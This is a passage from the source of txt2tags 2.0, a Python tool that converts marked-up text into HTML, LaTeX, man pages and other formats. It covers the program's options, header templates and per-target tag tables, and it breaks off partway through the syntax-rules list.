farvardin/txt2tags-test
|
refs/heads/master
|
old/txt2tags-2.0.py
|
5
|
#!/usr/bin/env python
# txt2tags - generic text conversion tool
# http://txt2tags.sf.net
#
# Copyright 2001, 2002, 2003, 2004 Aurelio Marinho Jargas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You have received a copy of the GNU General Public License along
# with this program, on the COPYING file.
#
##################################################################
# #
# - IMPORTANT - #
# #
# Due the major syntax changes, the new 2.x series BREAKS #
# backwards compatibility. #
# #
# Use the 't2tconv' script to upgrade your existing .t2t files #
# to conform the new v2.0 syntax. #
# #
# Do a visual inspection on the new converted file. #
# Specially Pre & Post proc filters can break. Check them! #
# #
##################################################################
########################################################################
#
# BORING CODE EXPLANATION AHEAD
#
# Just read if you wish to understand how the txt2tags code works
#
########################################################################
#
# Version 2.0 was a complete rewrite for the program 'core'.
#
# Now the code that [1] parses the marked text is separated from the
# code that [2] insert the target tags.
#
# [1] made by: def convert()
# [2] made by: class BlockMaster
#
# The structures of the marked text are identifyed and its contents are
# extracted into a data holder (Python lists and dictionaries).
#
# When parsing the source file, the blocks (para, lists, quote, table)
# are opened with BlockMaster, right when found. Then its contents,
# which spans on several lines, are feeded into a special holder on the
# BlockMaster instance. Just when the block is closed, the target tags
# are inserted for the full block as a whole, in one pass. This way, we
# have a better control on blocks. Much better than the previous line by
# line approach.
#
# In other words, whenever inside a block, the parser *holds* the tag
# insertion process, waiting until the full block is readed. That was
# needed primary to close paragraphs for the new XHTML target, but
# proved to be a very good adding, improving many other processings.
#
# -------------------------------------------------------------------
#
# There is also a brand new code for the Configuration schema, 100%
# rewritten. There are new classes, all self documented: CommandLine,
# SourceDocument, ConfigMaster and ConfigLines. In short, a new RAW
# Config format was created, and all kind of configuration is first
# converted to this format, and then a generic method parses it.
#
# The init processing was changed also, and now the functions which
# gets informations about the input files are: get_infiles_config(),
# process_source_file() and convert_this_files()
#
# Other parts are untouched, and remains the same as in v1.7, as the
# marks regexes, target Headers and target Tags&Rules.
#
########################################################################
# Now I think the code is nice, easier to read and understand
#XXX Python coding warning
# Avoid common mistakes:
# - do NOT use newlist=list instead newlist=list[:]
# - do NOT use newdic=dic instead newdic=dic.copy()
# - do NOT use dic[key] instead dic.get(key)
# - do NOT use del dic[key] without has_key() before
#XXX Smart Image Align don't work if the image is a link
# Can't fix that because the image is expanded together with the
# link, at the linkbank filling moment. Only the image is passed
# to parse_images(), not the full line, so it is always 'middle'.
#XXX Paragraph separation not valid inside Quote
# Quote will not have <p></p> inside, instead will close and open
# again the <blockquote>. This really sux in CSS, when defining a
# diferent background color. Still don't know how to fix it.
#XXX TODO (maybe)
# New mark or macro which expands to and anchor full title.
# It is necessary to parse the full document in this order:
# DONE 1st scan: HEAD: get all settings, including %!includeconf
# DONE 2nd scan: BODY: expand includes & apply %!preproc
# 3rd scan: BODY: read titles and compose TOC info
# 4th scan: BODY: full parsing, expanding [#anchor] 1st
# Steps 2 and 3 can be made together, with no tag adding.
# Two complete body scans will be *slow*, don't know if it worths.
##############################################################################
# User config (1=ON, 0=OFF)
USE_I18N = 1 # use gettext for i18ned messages? (default is 1)
COLOR_DEBUG = 1 # show debug messages in colors? (default is 1)
HTML_LOWER = 0 # use lowercased HTML tags instead upper? (default is 0)
##############################################################################
# these are all the core Python modules used by txt2tags (KISS!)
import re, string, os, sys, getopt
from time import strftime,time,localtime
# program information
my_url = 'http://txt2tags.sf.net'
my_name = 'txt2tags'
my_email = 'verde@aurelio.net'
my_version = '2.0' #-betaN
# i18n - just use if available
if USE_I18N:
try:
import gettext
# if your locale dir is different, change it here
cat = gettext.Catalog('txt2tags',localedir='/usr/share/locale/')
_ = cat.gettext
except:
_ = lambda x:x
else:
_ = lambda x:x
# FLAGS : the convertion related flags , may be used in %!options
# OPTIONS : the convertion related options, may be used in %!options
# ACTIONS : the other behaviour modifiers, valid on command line only
# SETTINGS: global miscelaneous settings, valid on RC file only
# CONFIG_KEYWORDS: the valid %!key:val keywords
#
# FLAGS and OPTIONS are configs that affect the converted document.
# They usually have also a --no-<option> to turn them OFF.
# ACTIONS are needed because when doing multiple input files, strange
# behaviour would be found, as use command line interface for the
# first file and gui for the second. There is no --no-<action>.
# --version and --help inside %!options are also odd
#
TARGETS = ['html', 'xhtml', 'sgml', 'tex', 'man', 'mgp', 'moin', 'pm6', 'txt']
FLAGS = {'headers' :1 , 'enum-title' :0 , 'mask-email' :0 ,
'toc-only' :0 , 'toc' :0 , 'rc' :1 ,
'css-suggar' :0 }
OPTIONS = {'target' :'', 'toc-level' :3 , 'style' :'',
'infile' :'', 'outfile' :'', 'encoding' :'',
'split' :0 , 'lang' :''}
ACTIONS = {'help' :0 , 'version' :0 , 'gui' :0 ,
'verbose' :0 , 'debug' :0 , 'dump-config':0 }
SETTINGS = {} # for future use
CONFIG_KEYWORDS = [
'target', 'encoding', 'style', 'options', 'preproc','postproc',
'guicolors']
TARGET_NAMES = {
'html' : _('HTML page'),
'xhtml': _('XHTML page'),
'sgml' : _('SGML document'),
'tex' : _('LaTeX document'),
'man' : _('UNIX Manual page'),
'mgp' : _('Magic Point presentation'),
'moin' : _('MoinMoin page'),
'pm6' : _('PageMaker 6.0 document'),
'txt' : _('Plain Text'),
}
DEBUG = 0 # do not edit here, please use --debug
VERBOSE = 0 # do not edit here, please use -v, -vv or -vvv
GUI = 0
RC_RAW = []
CMDLINE_RAW = []
CONF = {}
BLOCK = None
regex = {}
TAGS = {}
rules = {}
currdate = strftime('%Y%m%d',localtime(time())) # ISO current date
lang = 'english'
TARGET = ''
STDIN = STDOUT = '-'
ESCCHAR = '\x00'
SEPARATOR = '\x01'
LISTNAMES = {'-':'list', '+':'numlist', ':':'deflist'}
LINEBREAK = {'default':'\n', 'win':'\r\n', 'mac':'\r'}
RCFILE = {'default':'.txt2tagsrc', 'win':'_t2trc'}
#my_version = my_version + '-dev' + currdate[4:] # devel!
# plataform specific settings
LB = LINEBREAK.get(sys.platform[:3]) or LINEBREAK['default']
RC = RCFILE.get(sys.platform[:3]) or RCFILE['default']
VERSIONSTR = _("%s version %s <%s>")%(my_name,my_version,my_url)
USAGE = string.join([
'',
_("Usage: %s [OPTIONS] [infile.t2t ...]") % my_name,
'',
_(" -t, --target set target document type. currently supported:"),
' %s' % re.sub(r"[]'[]",'',repr(TARGETS)),
_(" -i, --infile=FILE set FILE as the input file name ('-' for STDIN)"),
_(" -o, --outfile=FILE set FILE as the output file name ('-' for STDOUT)"),
_(" -n, --enum-title enumerate all title lines as 1, 1.1, 1.1.1, etc"),
_(" -H, --no-headers suppress header, title and footer contents"),
_(" --headers show header, title and footer contents (default ON)"),
_(" --encoding set target file encoding (utf-8, iso-8859-1, etc)"),
_(" --style=FILE use FILE as the document style (like HTML CSS)"),
_(" --css-suggar insert CSS-friendly tags for HTML and XHTML targets"),
_(" --mask-email hide email from spam robots. x@y.z turns <x (a) y z>"),
_(" --toc add TOC (Table of Contents) to target document"),
_(" --toc-only print document TOC and exit"),
_(" --toc-level=N set maximum TOC level (depth) to N"),
_(" --rc read user config file ~/.txt2tagsrc (default ON)"),
_(" --gui invoke Graphical Tk Interface"),
_(" -v, --verbose print informative messages during convertion"),
_(" -h, --help print this help information and exit"),
_(" -V, --version print program version and exit"),
_(" --dump-config print all the config found and exit"),
'',
_("Turn OFF options:"),
" --no-outfile, --no-infile, --no-style, --no-encoding, --no-headers",
" --no-toc, --no-toc-only, --no-mask-email, --no-enum-title, --no-rc",
" --no-css-suggar",
'',
_("Example:\n %s -t html --toc myfile.t2t") % my_name,
'',
_("By default, converted output is saved to 'infile.<target>'."),
_("Use --outfile to force an output file name."),
_("If input file is '-', reads from STDIN."),
_("If output file is '-', dumps output to STDOUT."),
''
], '\n')
##############################################################################
# here is all the target's templates
# you may edit them to fit your needs
# - the %(HEADERn)s strings represent the Header lines
# - the %(STYLE)s string is changed by --style contents
# - the %(ENCODING)s string is changed by --encoding contents
# - if any of the above is empty, the full line is removed
# - use %% to represent a literal %
#
HEADER_TEMPLATE = {
'txt': """\
%(HEADER1)s
%(HEADER2)s
%(HEADER3)s
""",
'sgml': """\
<!doctype linuxdoc system>
<article>
<title>%(HEADER1)s
<author>%(HEADER2)s
<date>%(HEADER3)s
""",
'html': """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME="generator" CONTENT="http://txt2tags.sf.net">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=%(ENCODING)s">
<LINK REL="stylesheet" TYPE="text/css" HREF="%(STYLE)s">
<TITLE>%(HEADER1)s</TITLE>
</HEAD><BODY BGCOLOR="white" TEXT="black">
<P ALIGN="center"><CENTER><H1>%(HEADER1)s</H1>
<FONT SIZE="4">
<I>%(HEADER2)s</I><BR>
%(HEADER3)s
</FONT></CENTER>
""",
'htmlcss': """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME="generator" CONTENT="http://txt2tags.sf.net">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=%(ENCODING)s">
<LINK REL="stylesheet" TYPE="text/css" HREF="%(STYLE)s">
<TITLE>%(HEADER1)s</TITLE>
</HEAD>
<BODY>
<DIV CLASS="header" ID="header">
<H1>%(HEADER1)s</H1>
<H2>%(HEADER2)s</H2>
<H3>%(HEADER3)s</H3>
</DIV>
""",
'xhtml': """\
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(HEADER1)s</title>
<meta name="generator" content="http://txt2tags.sf.net" />
<meta http-equiv="Content-Type" content="text/html; charset=%(ENCODING)s" />
<link rel="stylesheet" type="text/css" href="%(STYLE)s" />
</head>
<body bgcolor="white" text="black">
<div align="center">
<h1>%(HEADER1)s</h1>
<h2>%(HEADER2)s</h2>
<h3>%(HEADER3)s</h3>
</div>
""",
'xhtmlcss': """\
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(HEADER1)s</title>
<meta name="generator" content="http://txt2tags.sf.net" />
<meta http-equiv="Content-Type" content="text/html; charset=%(ENCODING)s" />
<link rel="stylesheet" type="text/css" href="%(STYLE)s" />
</head>
<body>
<div class="header" id="header">
<h1>%(HEADER1)s</h1>
<h2>%(HEADER2)s</h2>
<h3>%(HEADER3)s</h3>
</div>
""",
'man': """\
.TH "%(HEADER1)s" 1 "%(HEADER3)s" "%(HEADER2)s"
""",
# TODO style to <HR>
'pm6': """\
<PMTags1.0 win><C-COLORTABLE ("Preto" 1 0 0 0)
><@Normal=
<FONT "Times New Roman"><CCOLOR "Preto"><SIZE 11>
<HORIZONTAL 100><LETTERSPACE 0><CTRACK 127><CSSIZE 70><C+SIZE 58.3>
<C-POSITION 33.3><C+POSITION 33.3><P><CBASELINE 0><CNOBREAK 0><CLEADING -0.05>
<GGRID 0><GLEFT 7.2><GRIGHT 0><GFIRST 0><G+BEFORE 7.2><G+AFTER 0>
<GALIGNMENT "justify"><GMETHOD "proportional"><G& "ENGLISH">
<GPAIRS 12><G%% 120><GKNEXT 0><GKWIDOW 0><GKORPHAN 0><GTABS $>
<GHYPHENATION 2 34 0><GWORDSPACE 75 100 150><GSPACE -5 0 25>
><@Bullet=<@-PARENT "Normal"><FONT "Abadi MT Condensed Light">
<GLEFT 14.4><G+BEFORE 2.15><G%% 110><GTABS(25.2 l "")>
><@PreFormat=<@-PARENT "Normal"><FONT "Lucida Console"><SIZE 8><CTRACK 0>
<GLEFT 0><G+BEFORE 0><GALIGNMENT "left"><GWORDSPACE 100 100 100><GSPACE 0 0 0>
><@Title1=<@-PARENT "Normal"><FONT "Arial"><SIZE 14><B>
<GCONTENTS><GLEFT 0><G+BEFORE 0><GALIGNMENT "left">
><@Title2=<@-PARENT "Title1"><SIZE 12><G+BEFORE 3.6>
><@Title3=<@-PARENT "Title1"><SIZE 10><GLEFT 7.2><G+BEFORE 7.2>
><@Title4=<@-PARENT "Title3">
><@Title5=<@-PARENT "Title3">
><@Quote=<@-PARENT "Normal"><SIZE 10><I>>
%(HEADER1)s
%(HEADER2)s
%(HEADER3)s
""",
'mgp': """\
#!/usr/X11R6/bin/mgp -t 90
%%deffont "normal" xfont "utopia-medium-r", charset "iso8859-1"
%%deffont "normal-i" xfont "utopia-medium-i", charset "iso8859-1"
%%deffont "normal-b" xfont "utopia-bold-r" , charset "iso8859-1"
%%deffont "normal-bi" xfont "utopia-bold-i" , charset "iso8859-1"
%%deffont "mono" xfont "courier-medium-r", charset "iso8859-1"
%%default 1 size 5
%%default 2 size 8, fore "yellow", font "normal-b", center
%%default 3 size 5, fore "white", font "normal", left, prefix " "
%%tab 1 size 4, vgap 30, prefix " ", icon arc "red" 40, leftfill
%%tab 2 prefix " ", icon arc "orange" 40, leftfill
%%tab 3 prefix " ", icon arc "brown" 40, leftfill
%%tab 4 prefix " ", icon arc "darkmagenta" 40, leftfill
%%tab 5 prefix " ", icon arc "magenta" 40, leftfill
%%%%------------------------- end of headers -----------------------------
%%page
%%size 10, center, fore "yellow"
%(HEADER1)s
%%font "normal-i", size 6, fore "white", center
%(HEADER2)s
%%font "mono", size 7, center
%(HEADER3)s
""",
# TODO please, improve me!
'moin': """\
'''%(HEADER1)s'''
''%(HEADER2)s''
%(HEADER3)s
""",
'tex': \
r"""\documentclass[11pt,a4paper]{article}
\usepackage{amsfonts,graphicx,url}
\usepackage[%(ENCODING)s]{inputenc} %% char encoding
\usepackage{%(STYLE)s} %% user defined package
\pagestyle{plain} %% do page numbering ('empty' turns off)
\frenchspacing %% no aditional spaces after periods
\setlength{\parskip}{8pt}\parindent=0pt %% no paragraph indentation
%% uncomment next line for fancy PDF output on Adobe Acrobat Reader
%%\usepackage[pdfstartview=FitV,colorlinks=true,bookmarks=true]{hyperref}
\title{%(HEADER1)s}
\author{%(HEADER2)s}
\begin{document}
\date{%(HEADER3)s}
\maketitle
\clearpage
"""
}
##############################################################################
def getTags(target):
"Returns all the known tags for the specified target"
keys = [
'paragraphOpen','paragraphClose',
'title1','title2','title3','title4','title5',
'numtitle1','numtitle2','numtitle3','numtitle4','numtitle5',
'blockVerbOpen','blockVerbClose',
'blockQuoteOpen','blockQuoteClose','blockQuoteLine',
'fontMonoOpen','fontMonoClose',
'fontBoldOpen','fontBoldClose',
'fontItalicOpen','fontItalicClose',
'fontUnderlineOpen','fontUnderlineClose',
'listOpen','listClose',
'listItemOpen','listItemClose','listItemLine',
'numlistOpen','numlistClose',
'numlistItemOpen','numlistItemClose','numlistItemLine',
'deflistOpen','deflistClose',
'deflistItem1Open','deflistItem1Close',
'deflistItem2Open','deflistItem2Close',
'bar1','bar2',
'url','urlMark','email','emailMark',
'img',
'tableOpen','tableClose',
'tableRowOpen','tableRowClose','tableRowSep',
'tableCellOpen','tableCellClose','tableCellSep',
'tableTitleCellOpen','tableTitleCellClose','tableTitleCellSep',
'tableTitleRowOpen','tableTitleRowClose',
'tableBorder', 'tableAlignLeft', 'tableAlignCenter',
'tableCellAlignLeft','tableCellAlignRight','tableCellAlignCenter',
'tableColAlignLeft','tableColAlignRight','tableColAlignCenter',
'tableColAlignSep',
'anchor','comment',
'TOC','tocOpen','tocClose','tocOpenCss','tocCloseCss',
'bodyOpenCss','bodyCloseCss',
'EOD'
]
alltags = {
'txt': {
'title1' : ' \a' ,
'title2' : '\t\a' ,
'title3' : '\t\t\a' ,
'title4' : '\t\t\t\a' ,
'title5' : '\t\t\t\t\a',
'blockQuoteLine' : '\t' ,
'listItemOpen' : '- ' ,
'numlistItemOpen' : '\a. ' ,
'bar1' : '\a' ,
'bar2' : '\a' ,
'url' : '\a' ,
'urlMark' : '\a (\a)' ,
'email' : '\a' ,
'emailMark' : '\a (\a)' ,
'img' : '[\a]' ,
},
'html': {
'paragraphOpen' : '<P>' ,
'paragraphClose' : '</P>' ,
'title1' : '~A~<H1>\a</H1>' ,
'title2' : '~A~<H2>\a</H2>' ,
'title3' : '~A~<H3>\a</H3>' ,
'title4' : '~A~<H4>\a</H4>' ,
'title5' : '~A~<H5>\a</H5>' ,
'blockVerbOpen' : '<PRE>' ,
'blockVerbClose' : '</PRE>' ,
'blockQuoteOpen' : '<BLOCKQUOTE>' ,
'blockQuoteClose' : '</BLOCKQUOTE>' ,
'fontMonoOpen' : '<CODE>' ,
'fontMonoClose' : '</CODE>' ,
'fontBoldOpen' : '<B>' ,
'fontBoldClose' : '</B>' ,
'fontItalicOpen' : '<I>' ,
'fontItalicClose' : '</I>' ,
'fontUnderlineOpen' : '<U>' ,
'fontUnderlineClose' : '</U>' ,
'listOpen' : '<UL>' ,
'listClose' : '</UL>' ,
'listItemOpen' : '<LI>' ,
'numlistOpen' : '<OL>' ,
'numlistClose' : '</OL>' ,
'numlistItemOpen' : '<LI>' ,
'deflistOpen' : '<DL>' ,
'deflistClose' : '</DL>' ,
'deflistItem1Open' : '<DT>' ,
'deflistItem1Close' : '</DT>' ,
'deflistItem2Open' : '<DD>' ,
'bar1' : '<HR NOSHADE SIZE=1>' ,
'bar2' : '<HR NOSHADE SIZE=5>' ,
'url' : '<A HREF="\a">\a</A>' ,
'urlMark' : '<A HREF="\a">\a</A>' ,
'email' : '<A HREF="mailto:\a">\a</A>' ,
'emailMark' : '<A HREF="mailto:\a">\a</A>' ,
'img' :'<IMG ALIGN="~A~" SRC="\a" BORDER="0" ALT="">',
'tableOpen' : '<TABLE~A~ CELLPADDING="4"~B~>',
'tableClose' : '</TABLE>' ,
'tableRowOpen' : '<TR>' ,
'tableRowClose' : '</TR>' ,
'tableCellOpen' : '<TD\a>' ,
'tableCellClose' : '</TD>' ,
'tableTitleCellOpen' : '<TH>' ,
'tableTitleCellClose' : '</TH>' ,
'tableBorder' : ' BORDER="1"' ,
'tableAlignCenter' : ' ALIGN="center"',
'tableCellAlignRight' : ' ALIGN="right"' ,
'tableCellAlignCenter': ' ALIGN="center"',
'anchor' : '<A NAME="\a"></A>\n',
'tocOpenCss' : '<DIV CLASS="toc" ID="toc">',
'tocCloseCss' : '</DIV>',
'bodyOpenCss' : '<DIV CLASS="body" ID="body">',
'bodyCloseCss' : '</DIV>',
'comment' : '<!-- \a -->' ,
'EOD' : '</BODY></HTML>'
},
#TIP xhtml inherits all HTML definitions (lowercased)
#TIP http://www.w3.org/TR/xhtml1/#guidelines
#TIP http://www.htmlref.com/samples/Chapt17/17_08.htm
'xhtml': {
'listItemClose' : '</li>' ,
'numlistItemClose' : '</li>' ,
'deflistItem2Close' : '</dd>' ,
'bar1' : '<hr class="light" />',
'bar2' : '<hr class="heavy" />',
'anchor' : '<a id="\a" name="\a"></a>\n',
'img' :'<img align="~A~" src="\a" border="0" alt=""/>',
},
'sgml': {
'paragraphOpen' : '<p>' ,
'title1' : '<sect>\a~A~<p>' ,
'title2' : '<sect1>\a~A~<p>' ,
'title3' : '<sect2>\a~A~<p>' ,
'title4' : '<sect3>\a~A~<p>' ,
'title5' : '<sect4>\a~A~<p>' ,
'blockVerbOpen' : '<tscreen><verb>' ,
'blockVerbClose' : '</verb></tscreen>' ,
'blockQuoteOpen' : '<quote>' ,
'blockQuoteClose' : '</quote>' ,
'fontMonoOpen' : '<tt>' ,
'fontMonoClose' : '</tt>' ,
'fontBoldOpen' : '<bf>' ,
'fontBoldClose' : '</bf>' ,
'fontItalicOpen' : '<em>' ,
'fontItalicClose' : '</em>' ,
'fontUnderlineOpen' : '<bf><em>' ,
'fontUnderlineClose' : '</em></bf>' ,
'listOpen' : '<itemize>' ,
'listClose' : '</itemize>' ,
'listItemOpen' : '<item>' ,
'numlistOpen' : '<enum>' ,
'numlistClose' : '</enum>' ,
'numlistItemOpen' : '<item>' ,
'deflistOpen' : '<descrip>' ,
'deflistClose' : '</descrip>' ,
'deflistItem1Open' : '<tag>' ,
'deflistItem1Close' : '</tag>' ,
'bar1' : '<!-- \a -->' ,
'bar2' : '<!-- \a -->' ,
'url' : '<htmlurl url="\a" name="\a">' ,
'urlMark' : '<htmlurl url="\a" name="\a">' ,
'email' : '<htmlurl url="mailto:\a" name="\a">' ,
'emailMark' : '<htmlurl url="mailto:\a" name="\a">' ,
'img' : '<figure><ph vspace=""><img src="\a">'+\
'</figure>' ,
'tableOpen' : '<table><tabular ca="~C~">' ,
'tableClose' : '</tabular></table>' ,
'tableRowSep' : '<rowsep>' ,
'tableCellSep' : '<colsep>' ,
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'comment' : '<!-- \a -->' ,
'anchor' : '<label id="\a">' ,
'TOC' : '<toc>' ,
'EOD' : '</article>'
},
'tex': {
'title1' : '\n\section*{\a}',
'title2' : '\\subsection*{\a}' ,
'title3' : '\\subsubsection*{\a}' ,
# title 4/5: DIRTY: para+BF+\\+\n
'title4' : '\\paragraph{}\\textbf{\a}\\\\\n',
'title5' : '\\paragraph{}\\textbf{\a}\\\\\n',
'numtitle1' : '\n\section{\a}',
'numtitle2' : '\\subsection{\a}' ,
'numtitle3' : '\\subsubsection{\a}' ,
'blockVerbOpen' : '\\begin{verbatim}' ,
'blockVerbClose' : '\\end{verbatim}' ,
'blockQuoteOpen' : '\\begin{quotation}' ,
'blockQuoteClose' : '\\end{quotation}' ,
'fontMonoOpen' : '\\texttt{' ,
'fontMonoClose' : '}' ,
'fontBoldOpen' : '\\textbf{' ,
'fontBoldClose' : '}' ,
'fontItalicOpen' : '\\textit{' ,
'fontItalicClose' : '}' ,
'fontUnderlineOpen' : '\\underline{' ,
'fontUnderlineClose' : '}' ,
'listOpen' : '\\begin{itemize}' ,
'listClose' : '\\end{itemize}' ,
'listItemOpen' : '\\item ' ,
'numlistOpen' : '\\begin{enumerate}' ,
'numlistClose' : '\\end{enumerate}' ,
'numlistItemOpen' : '\\item ' ,
'deflistOpen' : '\\begin{description}',
'deflistClose' : '\\end{description}' ,
'deflistItem1Open' : '\\item[' ,
'deflistItem1Close' : ']' ,
'bar1' : '\n\\hrulefill{}\n' ,
'bar2' : '\n\\rule{\linewidth}{1mm}\n',
'url' : '\\url{\a}' ,
'urlMark' : '\\textit{\a} (\\url{\a})' ,
'email' : '\\url{\a}' ,
'emailMark' : '\\textit{\a} (\\url{\a})' ,
'img' : '\\includegraphics{\a}',
'tableOpen' : '\\begin{center}\\begin{tabular}{|~C~|}',
'tableClose' : '\\end{tabular}\\end{center}',
'tableRowOpen' : '\\hline ' ,
'tableRowClose' : ' \\\\' ,
'tableCellSep' : ' & ' ,
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'tableColAlignSep' : '|' ,
'comment' : '% \a' ,
'TOC' : '\\tableofcontents\\clearpage',
'EOD' : '\\end{document}'
},
'moin': {
'title1' : '= \a =' ,
'title2' : '== \a ==' ,
'title3' : '=== \a ===' ,
'title4' : '==== \a ====' ,
'title5' : '===== \a =====',
'blockVerbOpen' : '{{{' ,
'blockVerbClose' : '}}}' ,
'blockQuoteLine' : ' ' ,
'fontMonoOpen' : '{{{' ,
'fontMonoClose' : '}}}' ,
'fontBoldOpen' : "'''" ,
'fontBoldClose' : "'''" ,
'fontItalicOpen' : "''" ,
'fontItalicClose' : "''" ,
'fontUnderlineOpen' : "__" ,
'fontUnderlineClose' : "__" ,
'listItemOpen' : ' * ' ,
'numlistItemOpen' : ' \a. ' ,
'bar1' : '----' ,
'bar2' : '----' ,
'url' : '[\a]' ,
'urlMark' : '[\a \a]' ,
'email' : '[\a]' ,
'emailMark' : '[\a \a]' ,
'img' : '[\a]' ,
'tableRowOpen' : '||' ,
'tableCellOpen' : '\a' ,
'tableCellClose' : '||' ,
'tableTitleCellClose' : '||' ,
'tableCellAlignRight' : '<)>' ,
'tableCellAlignCenter': '<:>' ,
'comment' : '## \a' ,
'TOC' : '[[TableOfContents]]'
},
'mgp': {
'paragraphOpen' : '%font "normal", size 5' ,
'title1' : '%page\n\n\a\n' ,
'title2' : '%page\n\n\a\n' ,
'title3' : '%page\n\n\a\n' ,
'title4' : '%page\n\n\a\n' ,
'title5' : '%page\n\n\a\n' ,
'blockVerbOpen' : '%font "mono"' ,
'blockVerbClose' : '%font "normal"' ,
'blockQuoteOpen' : '%prefix " "' ,
'blockQuoteClose' : '%prefix " "' ,
'fontMonoOpen' : '\n%cont, font "mono"\n' ,
'fontMonoClose' : '\n%cont, font "normal"\n' ,
'fontBoldOpen' : '\n%cont, font "normal-b"\n' ,
'fontBoldClose' : '\n%cont, font "normal"\n' ,
'fontItalicOpen' : '\n%cont, font "normal-i"\n' ,
'fontItalicClose' : '\n%cont, font "normal"\n' ,
'fontUnderlineOpen' : '\n%cont, fore "cyan"\n' ,
'fontUnderlineClose' : '\n%cont, fore "white"\n' ,
'listItemLine' : '\t' ,
'numlistItemLine' : '\t' ,
'deflistItem1Open' : '\t\n%cont, font "normal-b"\n',
'deflistItem1Close' : '\n%cont, font "normal"\n' ,
'bar1' : '%bar "white" 5' ,
'bar2' : '%pause' ,
'url' : '\n%cont, fore "cyan"\n\a' +\
'\n%cont, fore "white"\n' ,
'urlMark' : '\a \n%cont, fore "cyan"\n\a'+\
'\n%cont, fore "white"\n' ,
'email' : '\n%cont, fore "cyan"\n\a' +\
'\n%cont, fore "white"\n' ,
'emailMark' : '\a \n%cont, fore "cyan"\n\a'+\
'\n%cont, fore "white"\n' ,
'img' : '\n%~A~\n%newimage "\a"\n%left\n',
'comment' : '%% \a' ,
'tocOpen' : '%page\n\n\n' ,
'EOD' : '%%EOD'
},
# man groff_man ; man 7 groff
'man': {
'paragraphOpen' : '.P' ,
'title1' : '.SH \a' ,
'title2' : '.SS \a' ,
'title3' : '.SS \a' ,
'title4' : '.SS \a' ,
'title5' : '.SS \a' ,
'blockVerbOpen' : '.nf' ,
'blockVerbClose' : '.fi\n' ,
'blockQuoteOpen' : '.RS' ,
'blockQuoteClose' : '.RE' ,
'fontBoldOpen' : '\\fB' ,
'fontBoldClose' : '\\fR' ,
'fontItalicOpen' : '\\fI' ,
'fontItalicClose' : '\\fR' ,
'listOpen' : '.RS' ,
'listItemOpen' : '.IP \(bu 3\n',
'listClose' : '.RE' ,
'numlistOpen' : '.RS' ,
'numlistItemOpen' : '.IP \a. 3\n',
'numlistClose' : '.RE' ,
'deflistItem1Open' : '.TP\n' ,
'bar1' : '\n\n' ,
'bar2' : '\n\n' ,
'url' : '\a' ,
'urlMark' : '\a (\a)',
'email' : '\a' ,
'emailMark' : '\a (\a)',
'img' : '\a' ,
'tableOpen' : '.TS\n~A~~B~tab(^); ~C~.',
'tableClose' : '.TE' ,
'tableRowOpen' : ' ' ,
'tableCellSep' : '^' ,
'tableAlignCenter' : 'center, ',
'tableBorder' : 'allbox, ',
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'comment' : '.\\" \a'
},
'pm6': {
'paragraphOpen' : '<@Normal:>' ,
'title1' : '\n<@Title1:>\a',
'title2' : '\n<@Title2:>\a',
'title3' : '\n<@Title3:>\a',
'title4' : '\n<@Title4:>\a',
'title5' : '\n<@Title5:>\a',
'blockVerbOpen' : '<@PreFormat:>' ,
'blockQuoteLine' : '<@Quote:>' ,
'fontMonoOpen' : '<FONT "Lucida Console"><SIZE 9>' ,
'fontMonoClose' : '<SIZE$><FONT$>',
'fontBoldOpen' : '<B>' ,
'fontBoldClose' : '<P>' ,
'fontItalicOpen' : '<I>' ,
'fontItalicClose' : '<P>' ,
'fontUnderlineOpen' : '<U>' ,
'fontUnderlineClose' : '<P>' ,
'listOpen' : '<@Bullet:>' ,
'listItemOpen' : '\x95\t' , # \x95 == ~U
'numlistOpen' : '<@Bullet:>' ,
'numlistItemOpen' : '\x95\t' ,
'bar1' : '\a' ,
'bar2' : '\a' ,
'url' : '<U>\a<P>' , # underline
'urlMark' : '\a <U>\a<P>' ,
'email' : '\a' ,
'emailMark' : '\a \a' ,
'img' : '\a'
}
}
# make the HTML -> XHTML inheritance
xhtml = alltags['html'].copy()
for key in xhtml.keys(): xhtml[key] = string.lower(xhtml[key])
# some like HTML tags as lowercase, some don't... (headers out)
if HTML_LOWER: alltags['html'] = xhtml.copy()
xhtml.update(alltags['xhtml'])
alltags['xhtml'] = xhtml.copy()
# compose the target tags dictionary
tags = {}
target_tags = alltags[target].copy()
for key in keys: tags[key] = '' # create empty keys
for key in target_tags.keys():
tags[key] = maskEscapeChar(target_tags[key]) # populate
return tags
##############################################################################
def getRules(target):
"Returns all the target-specific syntax rules"
ret = {}
allrules = [
# target rules (ON/OFF)
'linkable', # target supports external links
'tableable', # target supports tables
'imglinkable', # target supports images as links
'imgalignable', # target supports image alignment
'imgasdefterm', # target supports image as definition term
'autonumberlist', # target supports numbered lists natively
'autonumbertitle', # target supports numbered titles natively
'parainsidelist', # lists items supports paragraph
'spacedlistitem', # lists support blank lines between items
'listnotnested', # lists cannot be nested
'quotenotnested', # quotes cannot be nested
'verbblocknotescaped', # don't escape specials in verb block
'verbblockfinalescape', # do final escapes in verb block
'escapeurl', # escape special in link URL
'onelinepara', # dump paragraph as a single long line
